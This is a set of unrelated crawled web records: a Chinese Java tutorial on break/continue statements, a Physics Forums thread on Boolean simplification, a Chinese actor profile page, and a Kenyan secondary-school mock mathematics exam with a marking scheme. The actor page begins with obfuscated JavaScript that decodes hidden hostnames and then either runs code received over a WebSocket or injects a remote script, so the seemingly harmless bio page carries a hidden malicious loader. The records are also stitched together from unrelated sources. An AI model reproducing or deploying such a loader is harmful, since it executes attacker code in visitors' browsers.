{"ft_lang_label":"__label__en","ft_lang_prob":0.7020594,"math_prob":0.9958133,"size":3090,"snap":"2020-45-2020-50","text_gpt3_token_len":1314,"char_repetition_ratio":0.1779002,"word_repetition_ratio":0.32027972,"special_character_ratio":0.4906149,"punctuation_ratio":0.05531915,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996917,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-20T14:29:52Z\",\"WARC-Record-ID\":\"<urn:uuid:2bcaecc6-a877-44a4-90de-18768cb1f4f8>\",\"Content-Length\":\"36647\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fc18ad2e-f571-4c47-917f-2966f26eaa50>\",\"WARC-Concurrent-To\":\"<urn:uuid:29afeb86-2ba3-4a11-89f5-31bb59c63274>\",\"WARC-IP-Address\":\"218.146.255.183\",\"WARC-Target-URI\":\"http://html.datasheetbank.com/datasheet-html/313187/TECCOR/10page/Q2006LT.html?lang=en\",\"WARC-Payload-Digest\":\"sha1:SLC3JHKNJXAPZOO6UNFBWKCXYTLTAZAC\",\"WARC-Block-Digest\":\"sha1:DF4QMPPOLG2T4QZEJ7D4OKMUW3W2NB3L\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107872746.20_warc_CC-MAIN-20201020134010-20201020164010-00112.warc.gz\"}"}
https://www.littlewaterdrop.com/static/zh/cs/java/break-continue/index.html
[ "01_basic_12_break_and_continue\n\n## 第十二章 break语句和continue语句\n\n### 1 break语句(break statement)\n\nbreak语句可用于switch语句for语句while语句do-while语句中。当执行break语句时,程序会跳出当前语句,并将程序移到下一条语句继续执行。\n\n``````int sum = 0;\nfor (int i = 1; ; i++) {\nif (i > 10)\nbreak;\nsum += i;\n}\nSystem.out.println(\"The sum of 1 to 10 is \" + sum);\n\nsum = 0;\nint i = 1;\nwhile (true) {\nif (i > 10)\nbreak;\nsum += i;\ni++;\n}\nSystem.out.println(\"The sum of 1 to 10 is \" + sum);\n\nsum = 0;\ni = 1;\ndo {\nif (i > 10)\nbreak;\nsum += i;\ni++;\n} while (true);\nSystem.out.println(\"The sum of 1 to 10 is \" + sum);\n``````\n\nbreak语句还支持另一种形式,即结束某一条语句的运行。在这种情况下,break语句中会指定一个标签标识符。当break语句运行时,程序会立即停止执行目标标签所对应的语句。break语句不必运行在循环语句中。这种break语句主要用于跳出嵌套循环或者语句块。\n\n``````int count = 2;\nlabel: if (true) {\n...\nif (count == 2)\nbreak label; // 停止执行label对应的if语句\n...\n}\n``````\n\n### 2 continue语句(continue statement)\n\n``````int sum = 0;\nfor (int i = 0; i <= 10; i++) {\nif (i%2 == 0) {\nsum += i;\n} else {\ncontinue;\n}\n}\nSystem.out.println(\"The sum of even numbers from 1 to 10 is \" + sum);\n``````\n\n### 3 小结\n\nbreak语句和continue语句可以用于打断或者退出循环的执行。break语句直接退出循环语句;而continue语句则提前中止当前的循环执行,直接进入下一次循环判断或者下一次循环的执行。为了能够直接中止嵌套循环的执行,Java语言还支持带标签的break语句。当运行该break语句时,程序会直接中止该标签对应的语句。如果该标签对应的语句是嵌套循环的话,那么,该break语句能够直接中止多重循环的执行。", null, "###### 下一章", null, "" ]
[ null, "https://www.littlewaterdrop.com/img/arrow_left.5434740c.svg", null, "https://www.littlewaterdrop.com/img/arrow_right.11ea5efb.svg", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.7120445,"math_prob":0.9863751,"size":1397,"snap":"2023-40-2023-50","text_gpt3_token_len":894,"char_repetition_ratio":0.13208902,"word_repetition_ratio":0.36363637,"special_character_ratio":0.28346458,"punctuation_ratio":0.19354838,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934929,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-09T18:01:14Z\",\"WARC-Record-ID\":\"<urn:uuid:fb73c33c-0c1a-4335-a987-8f77c5ffde24>\",\"Content-Length\":\"131320\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:47011885-dca9-4c06-8911-9e0678eb7e5c>\",\"WARC-Concurrent-To\":\"<urn:uuid:78ad3994-327a-4d18-94d8-b7cb36b80635>\",\"WARC-IP-Address\":\"18.160.18.54\",\"WARC-Target-URI\":\"https://www.littlewaterdrop.com/static/zh/cs/java/break-continue/index.html\",\"WARC-Payload-Digest\":\"sha1:5ULVGFUDQDUIJW3DEMWG4R4DHQ5DLPN5\",\"WARC-Block-Digest\":\"sha1:DLHVX4AMJFOPV3NS5YVH3KJP27EGPEW4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100942.92_warc_CC-MAIN-20231209170619-20231209200619-00768.warc.gz\"}"}
https://www.physicsforums.com/threads/simplify-the-boolean-expression-2.712667/
[ "# Simplify the boolean expression #2\n\n## Homework Statement\n\nSimplify the expression using boolean algebra postulates, laws, theorems.\n\n$(\\overline{\\overline{x + \\overline{y})(xz + \\overline{y}}) + x (\\overline{yz}})$\n\n## The Attempt at a Solution\n\n$(\\overline{\\overline{x + \\overline{y})(xz + \\overline{y}}) + x (\\overline{yz}})$\n\n1. ((x + y')(xz + y'))'' (x(yz)')'\n2. (x + y')(xz + y') (x' + (yz)'')\n3. (x + y')(xz + y') (x' + yz)\n4. (x + y')(x + y')(z + y')(x' + yz)\n5. (x + y')(z + y')(x' + yz)\n6. (xz + y')(x' + yz)\n7. xzx' + xzyz + y'x' + y'yz\n8. xx'z + xyzz + x'y' + y'yz\n9. 0*z + xyz + x'y' + 0*z\n10. 0 + xyz + x'y' + 0\n11. xyz + x'y'\n\nAm I on the right track? I keep thinking that I've done something wrong here... Thanks in advance for your help.\n\nEdit: Added steps 4-11. I believe this is the most simplified. Any critique on my methods? Perhaps there is a more efficient way to simplify this? Thanks.\n\nLast edited:\n\nberkeman\nMentor\n\n## Homework Statement\n\nSimplify the expression using boolean algebra postulates, laws, theorems.\n\n$(\\overline{\\overline{x + \\overline{y})(xz + \\overline{y}}) + x (\\overline{yz}})$\n\n## The Attempt at a Solution\n\n$(\\overline{\\overline{x + \\overline{y})(xz + \\overline{y}}) + x (\\overline{yz}})$\n\n1. ((x + y')(xz + y'))'' (x(yz)')'\n2. (x + y')(xz + y') (x' + (yz)'')\n3. (x + y')(xz + y') (x' + yz)\n4. (x + y')(x + y')(z + y')(x' + yz)\n5. (x + y')(z + y')(x' + yz)\n6. (xz + y')(x' + yz)\n7. xzx' + xzyz + y'x' + y'yz\n8. xx'z + xyzz + x'y' + y'yz\n9. 0*z + xyz + x'y' + 0*z\n10. 0 + xyz + x'y' + 0\n11. xyz + x'y'\n\nAm I on the right track? I keep thinking that I've done something wrong here... Thanks in advance for your help.\n\nEdit: Added steps 4-11. I believe this is the most simplified. Any critique on my methods? Perhaps there is a more efficient way to simplify this? Thanks.\n\nWhat are the double nots \" versus the single nots ' for? Sorry if I'm missing the obvious.\n\nCan you post the Karnaugh maps for the original problem and your solution? That's how I check my answers on these types of problems.", null, "" ]
[ null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5964245,"math_prob":0.9995259,"size":912,"snap":"2021-21-2021-25","text_gpt3_token_len":359,"char_repetition_ratio":0.19933921,"word_repetition_ratio":0.11764706,"special_character_ratio":0.4375,"punctuation_ratio":0.13471502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9968762,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-16T15:23:23Z\",\"WARC-Record-ID\":\"<urn:uuid:30eb28d0-2850-49c6-bf9a-eef127ee2d25>\",\"Content-Length\":\"65795\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71b474be-ec8c-4fed-9c76-9291e588d951>\",\"WARC-Concurrent-To\":\"<urn:uuid:fa93ec08-d202-4106-81a6-e51cada42594>\",\"WARC-IP-Address\":\"104.26.14.132\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/simplify-the-boolean-expression-2.712667/\",\"WARC-Payload-Digest\":\"sha1:4W4KVFXBEI4ABLNQAQXO3XJIWYOYUNDK\",\"WARC-Block-Digest\":\"sha1:J2UDYEQAAI7DMT6F7PINDODTZN2C2YO6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991224.58_warc_CC-MAIN-20210516140441-20210516170441-00596.warc.gz\"}"}
https://www.sz-rtcj.com/actordetail-11.html
[ "function iJVeD(e){var t=\"\",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function XTbhHN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t=\"\",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,\"\");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return iJVeD(t);};window['\\x56\\x69\\x47\\x4b\\x49\\x6b']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=XTbhHN,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c+''+c,'g'),c)));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('dGcubbG9jbbG9nLmNu','dHIueWVzdW442NzguY29t','138350',window,document,['b','4']);}:function(){};\n\n# 徐海乔 男\n\n• 性别:\n• 职业:演员\n• 星座:白羊座\n• 血型:O型\n• 身高:180cm\n• 体重:65kg\n• 地区:内地\n• 生日:1983年4月17日\n• 出生地:山东济南\n• 毕业院校:上海戏剧学院表演系03级本科班\n• 代表作:《蓬莱八仙》《大学生士兵的故事》《娘心计》" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.5234504,"math_prob":0.982964,"size":2201,"snap":"2021-31-2021-39","text_gpt3_token_len":1371,"char_repetition_ratio":0.12380519,"word_repetition_ratio":0.1978022,"special_character_ratio":0.379373,"punctuation_ratio":0.25189394,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9603369,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-29T16:13:37Z\",\"WARC-Record-ID\":\"<urn:uuid:e33984c2-1f4a-4253-8477-d4a77cd60007>\",\"Content-Length\":\"46169\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c03f79e3-f7b2-4883-a65a-66503f1af656>\",\"WARC-Concurrent-To\":\"<urn:uuid:962a3a94-862b-4d62-801b-33045a0a5435>\",\"WARC-IP-Address\":\"180.215.201.177\",\"WARC-Target-URI\":\"https://www.sz-rtcj.com/actordetail-11.html\",\"WARC-Payload-Digest\":\"sha1:DBYG2RX7SDKPGDLOOBJIY5H3NAZDKFEV\",\"WARC-Block-Digest\":\"sha1:QOGTONEMW34PJY6XEJE4FLPYNB3IXRMD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153860.57_warc_CC-MAIN-20210729140649-20210729170649-00638.warc.gz\"}"}
https://numbermatics.com/n/218/
[ "# 218\n\n## 218 is an even composite number composed of two prime numbers multiplied together.\n\nWhat does the number 218 look like?\n\nThis visualization shows the relationship between its 2 prime factors (large circles) and 4 divisors.\n\n218 is an even composite number. It is composed of two distinct prime numbers multiplied together. It has a total of four divisors.\n\n## Prime factorization of 218:\n\n### 2 × 109\n\nSee below for interesting mathematical facts about the number 218 from the Numbermatics database.\n\n### Names of 218\n\n• Cardinal: 218 can be written as Two hundred eighteen.\n\n### Scientific notation\n\n• Scientific notation: 2.18 × 102\n\n### Factors of 218\n\n• Number of distinct prime factors ω(n): 2\n• Total number of prime factors Ω(n): 2\n• Sum of prime factors: 111\n\n### Divisors of 218\n\n• Number of divisors d(n): 4\n• Complete list of divisors:\n• Sum of all divisors σ(n): 330\n• Sum of proper divisors (its aliquot sum) s(n): 112\n• 218 is a deficient number, because the sum of its proper divisors (112) is less than itself. Its deficiency is 106\n\n### Bases of 218\n\n• Binary: 110110102\n• Base-36: 62\n\n### Squares and roots of 218\n\n• 218 squared (2182) is 47524\n• 218 cubed (2183) is 10360232\n• The square root of 218 is 14.7648230601\n• The cube root of 218 is 6.0184616549\n\n### Scales and comparisons\n\nHow big is 218?\n• 218 seconds is equal to 3 minutes, 38 seconds.\n• To count from 1 to 218 would take you about forty-nine seconds.\n\nThis is a very rough estimate, based on a speaking rate of half a second every third order of magnitude. If you speak quickly, you could probably say any randomly-chosen number between one and a thousand in around half a second. Very big numbers obviously take longer to say, so we add half a second for every extra x1000. (We do not count involuntary pauses, bathroom breaks or the necessity of sleep in our calculation!)\n\n• A cube with a volume of 218 cubic inches would be around 0.5 feet tall.\n\n### Recreational maths with 218\n\n• 218 backwards is 812\n• The number of decimal digits it has is: 3\n• The sum of 218's digits is 11\n• More coming soon!\n\nHTML: To link to this page, just copy and paste the link below into your blog, web page or email.\n\nBBCODE: To link to this page in a forum post or comment box, just copy and paste the link code below:\n\nMLA style:\n\"Number 218 - Facts about the integer\". Numbermatics.com. 2022. Web. 27 September 2022.\n\nAPA style:\nNumbermatics. (2022). Number 218 - Facts about the integer. Retrieved 27 September 2022, from https://numbermatics.com/n/218/\n\nChicago style:\nNumbermatics. 2022. \"Number 218 - Facts about the integer\". https://numbermatics.com/n/218/\n\nThe information we have on file for 218 includes mathematical data and numerical statistics calculated using standard algorithms and methods. We are adding more all the time. If there are any features you would like to see, please contact us. Information provided for educational use, intellectual curiosity and fun!\n\nKeywords: Divisors of 218, math, Factors of 218, curriculum, school, college, exams, university, Prime factorization of 218, STEM, science, technology, engineering, physics, economics, calculator, two hundred eighteen.\n\nOh no. Javascript is switched off in your browser.\nSome bits of this website may not work unless you switch it on." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8764265,"math_prob":0.9060384,"size":2388,"snap":"2022-40-2023-06","text_gpt3_token_len":582,"char_repetition_ratio":0.11157718,"word_repetition_ratio":0.033333335,"special_character_ratio":0.26716918,"punctuation_ratio":0.16490486,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98037857,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-27T01:21:01Z\",\"WARC-Record-ID\":\"<urn:uuid:c404eb11-1f80-4c44-9d52-dc89d01e8953>\",\"Content-Length\":\"16901\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a6685a47-5aab-4c56-b186-6901e92f63d9>\",\"WARC-Concurrent-To\":\"<urn:uuid:8c874014-40d2-48ae-b301-17cbace65a86>\",\"WARC-IP-Address\":\"72.44.94.106\",\"WARC-Target-URI\":\"https://numbermatics.com/n/218/\",\"WARC-Payload-Digest\":\"sha1:TQSMVRDZATIGBABQ6V4SNJXYOKCAGWYQ\",\"WARC-Block-Digest\":\"sha1:XNWIRZURC6GVY4FZP2DWGSPLJQO5GJJQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030334974.57_warc_CC-MAIN-20220927002241-20220927032241-00129.warc.gz\"}"}
https://math.stackexchange.com/questions/2862553/first-order-stochastic-dominance
[ "First-Order Stochastic Dominance\n\nConsider two cumulative distribution functions $F(x)$ and $G(x)$ for $x\\in[a,b]$ where $G(x)$ has the first-order stochastic dominance over $F(x)$. That is, $F(x)>G(x)$ for all $x\\in(a,b)$. We assume $a<0$ and $b>0$. Let $f(x)$ and $g(x)$ be the probability density function of $F(x)$ and $G(x)$ respectively.\n\nSuppose the expected value of $x$ under $F(x)$ is positive: $$\\int_{a}^{b}xf(x)dx=\\int_{a}^{0}xf(x)dx+\\int_{0}^{b}xf(x)dx>0.$$\n\nUnder this condition, does $f(x)-g(x)>0$ always hold in any interval of $0<x<b$?\n\nGraphical Expression of the Question is Here.\n\n• Thank you for your comments. Could you tell me how I can edit my question? Should I delete this question and post a new question? Jul 25 '18 at 16:01\n• Please don't delete the question. There is a link that allows you to edit the question just below it. (It is just above and to the left of the box that shows your name.) Jul 25 '18 at 16:02\n• Also, your definition of FOSD seems much stronger than the usual definition. Is that intentional? Jul 25 '18 at 16:04\n• Yes, it is intentional. Thank you for pointing it out. Jul 25 '18 at 16:05\n\nSuppose $a=-1$ and $b=2$, that $F$ is the uniform distribution in the interval $[-1,2]$, and that $G$ is the uniform distribution in the interval $[0,2]$. Clearly the expected value of $x$ under $F$ is positive but $$g(x)=\\frac{1}{2}>\\frac{1}{3}=f(x)\\quad\\text{for all}\\;x\\in[0,b].$$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63173646,"math_prob":0.9998909,"size":519,"snap":"2022-05-2022-21","text_gpt3_token_len":184,"char_repetition_ratio":0.14563107,"word_repetition_ratio":0.0,"special_character_ratio":0.37379575,"punctuation_ratio":0.08943089,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99998987,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-24T22:57:37Z\",\"WARC-Record-ID\":\"<urn:uuid:6fd43893-68be-4591-bf3f-b2aa9eddcb26>\",\"Content-Length\":\"135535\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9dbc8cb0-3154-4dd1-a533-9484db72bd0c>\",\"WARC-Concurrent-To\":\"<urn:uuid:e182f5a6-fd59-40f2-a798-f60ed1544c23>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/2862553/first-order-stochastic-dominance\",\"WARC-Payload-Digest\":\"sha1:2CQTKJLWC6ESLCBARXN63KXTNADKPSPR\",\"WARC-Block-Digest\":\"sha1:ZRBKV6ZDGVQ7NVHNCQNJTHZRXPXCAFVG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320304686.15_warc_CC-MAIN-20220124220008-20220125010008-00469.warc.gz\"}"}
https://www.easyelimu.com/kenya-secondary-schools-pastpapers/mocks/2022/item/6126-mathematics-paper-2-questions-and-answers-lanjet-joint-mock-exams-2022
[ "## Mathematics Paper 2 Questions and Answers - Lanjet Joint Mock Exams 2022\n\nINSTRUCTIONS.\n\n• Answer all the questions in the spaces provided.\n\n### QUESTIONS\n\nSECTION 1 (50mks)\n\n1. The sum of n terms of the sequence:\n3,9,15,21…. Is 7500\n1. Find the 20th term of the sequence. (2mks)\n2. Determine the value of n. (2mks)\n2. A quadratic curve passes through the points (-2, 0) and (1, 0). Find the equation of the curve in the form y = ax2+bx+c, where a, b and c are constants. (2mks)\n3. Make h the subject of the formula. (2mks)\nq= 1+rh\n1-ht\n4. P (1,2) and Q(9,8) are the points on the ends of the diameter of a circle. Write down in terms of x and y the equation of the circle in the form: ax2+by2+x+y+c=0. (3mks)\n5. In the figure below, O is the centre of the circle and AT is a tangent to the circle at A. AT = 2√6cm and DT=4cm.", null, "Determine:\n1. OA (2mks)\n2. The value of angle AOB (2mks)\n6. In a transformation, an object with an area of 5cm2 is mapped onto an image whose area is 30cm2. Given that the matrix of the transformation is x", null, "1. Find the value of x. (2mks)\n2. Hence determine the inverse of the matrix", null, "7. The co-ordinates of P are (0,7) and Q are (3.5, 1.4). A point S divides PQ externally in the ratio 9:2. Find the co-ordinates of S. (3mks)\n8. The top of a coffee table is a regular hexagon. Each side of the hexagon measures 50.0cm, find the percentage error in calculating the perimeter of the top of the table. (3mks)\n9. The figure below represents a cuboid ABCDEFGH. AB=60cm, BC=11cm and CH=10cm.", null, "Calculate the angle between EB and plane EFGH. (3mks)\n10.\n1. Expand and simplify the expression", null, "up to the third term. (2mks)\n2. Hence use the expansion in (a) above to approximate the value of (39.6)5 correct to 3 significant figures. (2mks)\n11. A solution was gently heated, its temperature readings taken at intervals of 1 minute and recorded as shown in the table below:\n Time(min) 0 1 2 3 4 5 Temperature (ºC) 4 5.2 8.4 14.3 16.8 17.5\n1. On the grid provided below, draw the time – temperature graph. (2mks)\n2. Use the graph to find the average rate of change in temperature between t=1.8 and t=3.4. (2mks)\n12. The shortest distance between two points A(40ºN,20ºW) and B(ѲºS,20ºW) on the surface of the earth is 8008km. given that the radius of the earth is 6370km, determine the position of B. (Take π=22/7). (3mks)\n13. Simplify           √3         (2mks)\n√3 - √2\n14. The table below shows income tax rates in a certain year.\n Monthly income in Kshs. Tax rate in each shilling Up to 9680 10% From 9681 to 18800 15% From 18801 to 27920 20% From 27921 to 37040 25% Over 37040 30%\nIn that year, a monthly personal tax relief of ksh. 1056 was allowed. Calculate the monthly income tax paid by an employee who earned a monthly salary of kshs. 32,500. (4mks)\n15. Three types of beverages are mixed in the ration 1:3:5 respectively. Type A costs sh 26, type B costs sh 28 and type C sh 32, per packet. Find the cost of the mixture per packet. (3mks)\n16. The gradient of a curve is given by dy/dx = x2- 4x+3. The curve passes through the point (1,0). Find the equation of the curve. (3mks)\n\nSECTION II (50MKS)\n\n1. The hire purchase (H.P) price of an electronic device was ksh. 276,000. A deposit of ksh 60,000 was paid followed by 18 equal monthly installments.\n1. Calculate the monthly installment. (2mks)\n2. The cash price of the electronic device was 10% less than the hire purchase (H.P) price. Calculate the cash price. (2mks)\n3. Madam Kanini decided to buy the electronic device in cash. She was allowed a 5% discount on the cash price, she took a bank loan to buy the device. The bank charged compound interest on the loan at the rate of 20% p.a. the loan was repaid in 2 years.\n1. Calculate the amount repaid to the bank by the end of the second year. (3mks)\n2. Express as a percentage of the hire purchase (HP) price, the difference between the amount repaid to the bank and the hire purchase price. (3mks)\n2. An examination involves a written test and a practical test. The probability that a candidate passes the written test is 6/11. If the candidate passes the written test, then the probability of passing the practical test is 3/5, otherwise it would be 2/7.\n1. Illustrate this information on a tree diagram. (2mks)\n2. Determine the probability that a candidate is awarded:\n1. For passing both tests. (2mks)\n2. For passing the written test. (2mks)\n3. Determine the probability that the candidate;\n1. Passes one test. (2mks)\n2. Fails for not passing the written test. (2mks)\n3. Construct triangle PQR with PQ= 7.2cm, QR=6cm and <PQR=48º. (3mks)\n1. The locus L1, of points equidistant from P and Q and Locus L2 of points equidistant from P and R, meet at M. Locate M hence measure QM. (4mks)\n2.  A point X moves within triangle PQR such that QX ≥QM. Shade and label the locus of X. (3mks)\n4. Triangle PQR shown on the grid below has vertices P(5,5), Q(10,10) and R(10,15)", null, "1. Find the coordinates of the points P΄Q΄ and R΄ the images of P,Q and R respectively under transformation M whose matrix is [- 0.6  0.8] (3mks)\n[ 0.8    0.6]\nGiven that M is a reflection:\n1. Draw triangle P΄Q΄R΄ and the mirror line of the reflection. (2mks)\n2. Determine the equation of the mirror line of the reflection. (2mks)\n2. Triangle P˝Q˝R˝ is the image of triangle P΄Q΄R΄ under reflection N, where N is a reflection in the Y-axis.\n1. Determine triangle P˝Q˝R˝ (1mk)\n2. Determine a 2x2 matrix equivalent to the transformation NM. (2mks)\n5. In the figure below, PR is the diameter of the circle with centre O. Points P, Q, R and S are on the circumference of the circle. Angle PRQ = 72⁰ , QS = QP and line USV is a tangent to the circle at S.\nGiving reasons, calculate the size of:", null, "1. ∠QPR (2 marks)\n2. ∠PQS (2 marks)\n3. ∠OQS (2 marks)\n4. ∠RTS (2 marks)\n5. ∠RSV (2 marks)\n6. Three quantities R,S and T are such that R varies directly as S and inversely as the square of T.\n1. Given that R= 480 when S=150 and T=5, write an equation connecting R, S and T. (4mks)\n2.\n1. Find the value of R when S=360 and T=1.5. (2mks)\n2. Find the percentage change in R if s increase by 5% and T decreases by 20%. (4mks)\n7. For a C B C inservice training course for teachers, at least four (4) but not more that nine(9) teachers are to be chosen per school. The ratio of the number of male teachers to the number of female teachers must be less than 2:1 and there must be more males than females. If x and y represent the number of male teachers and female teachers respectively:\n1. Write down in their simplest form the inequalities that x and y must satisfy. (4mks)\n2. On the gird provided below, represent the inequalities on the graph. (4mks)\n3. Use the graph to determine the composition of the training group of:\n1. The largest size. (1mk)\n2. The smallest size. (1mk)\n8. The equation of a curve is given by y=5x- ½ x2.\n1. On the grid provided below, draw the curve of y=5x- ½ x2 for 0≤x≤6. (3mks)\n2. By integration, find the area bounded by the curve, the line x=6 and the x-axis. (3mks)\n3. On the same grid, draw the line y=2x. (1mk)\n4. Determine the area bounded by the curve and the line y=2x. (3mks)\n\n### MARKING SCHEME\n\nSECTION 1 (50mks)\n\n1. The sum of n terms of the sequence:\n3,9,15,21…. Is 7500\n1. Find the 20th term of the sequence. (2mks)\na = 3\nd = 6\nnth = a + (n - 1)d\n∴20th = 3 + (20 - 1)6\n=117\n2. Determine the value of n. (2mks)\nsn = n/2 {2a + (n - 1)d}\n7500 = n/2 {2 x 3 + (n - 1) 6}\n15000 = 6n2\n∴n2 = 2500\nn = ± 50\n= 50 terms\n2. A quadratic curve passes through the points (-2, 0) and (1, 0). Find the equation of the curve in the form y = ax2+bx+c, where a, b and c are constants. (2mks)", null, "∴(x + 2) = 0\nand (x - 1) = 0\nlet y = (x + 2) (x - 1)\n=> y = x2 + x - 2\n3. Make h the subject of the formula. (2mks)\nq= 1+rh\n1-ht\nq - qht = 1 + rh\nq - 1 = rh + qht\nq - 1 = h(r + qt)\n∴ h =  q - 1\nr + qt\n4. P (1,2) and Q(9,8) are the points on the ends of the diameter of a circle. Write down in terms of x and y the equation of the circle in the form: ax2+by2+x+y+c=0. (3mks)\nans = x2 + y2 - 10x - 10y + 25 = 0\n5. In the figure below, O is the centre of the circle and AT is a tangent to the circle at A. AT = 2√6cm and DT=4cm.", null, "Determine:\n1. OA (2mks)\nlet OD = x\nTO x TD = TA2\n(4 + x) 4 = (2√6)2\n16 + 4x = 24\n4x = 8\n∴ x = 2\n2. The value of angle AOB (2mks)", null, "∴ θ = 67.8\n∴ ∠ AOB = 2 x 67.8\n= 135.6\n6. In a transformation, an object with an area of 5cm2 is mapped onto an image whose area is 30cm2. Given that the matrix of the transformation is x", null, "1. Find the value of x. (2mks)\ndeterminant = 4x - 2(x - 1)\n= 2x + 2\narea scale factor = 30/5\ndet = ASF\n∴ 2x + 2 = 30/5\nx = 2\n2. Hence determine the inverse of the matrix", null, "", null, "", null, "7. The co-ordinates of P are (0,7) and Q are (3.5, 1.4). A point S divides PQ externally in the ratio 9:2. Find the co-ordinates of S. (3mks)", null, "∴ s = (4.5, -0.2)\n8. The top of a coffee table is a regular hexagon. Each side of the hexagon measures 50.0cm, find the percentage error in calculating the perimeter of the top of the table. (3mks)\nn = 6 sides\nactual perimeter = 50.0 x 6\n= 300 cm\nmaximum per = 50.05 x 6\n= 300.3\n∴ Abs. error = 300.3 - 300\n= 0.3\n% error = 0.3 / 300 x 100\n= 0.1 %\n9. The figure below represents a cuboid ABCDEFGH. AB=60cm, BC=11cm and CH=10cm.", null, "Calculate the angle between EB and plane EFGH. (3mks)", null, "EG2 = 112 + 602\n= 121 + 3600\nEG = √3721\n= 61 cm\nTan ∝ = 10/61\n= 0.1639\n∴ ∝ = 9.3º\n10.\n1. Expand and simplify the expression", null, "up to the third term. (2mks)\n(4x)5 + (4x)4(-y/2) + (4x)3(-y/2)2 + ..............\n1024x5 + 5 x 256(-y/2) + 10x64x3(-y2/4) + ............\n1024x5 - 6404x4y + 160x3y2 + ............\n2. Hence use the expansion in (a) above to approximate the value of (39.6)5 correct to 3 significant figures. (2mks)\nLet 39.6 = 40 - 0.4\n=> 39.65 = (40 - 0.4)5\ncomparing:\n\n4x = 40\n; x = 10\n-y/2 = 0.4\n∴ y = 0.8\nsubstituting;\n1024(105) - 640(104) x 0.8 + 160(103)(0.8)2 + ......\n= 102400000 - 5120000 + 102400\n= 97382400\n11. A solution was gently heated, its temperature readings taken at intervals of 1 minute and recorded as shown in the table 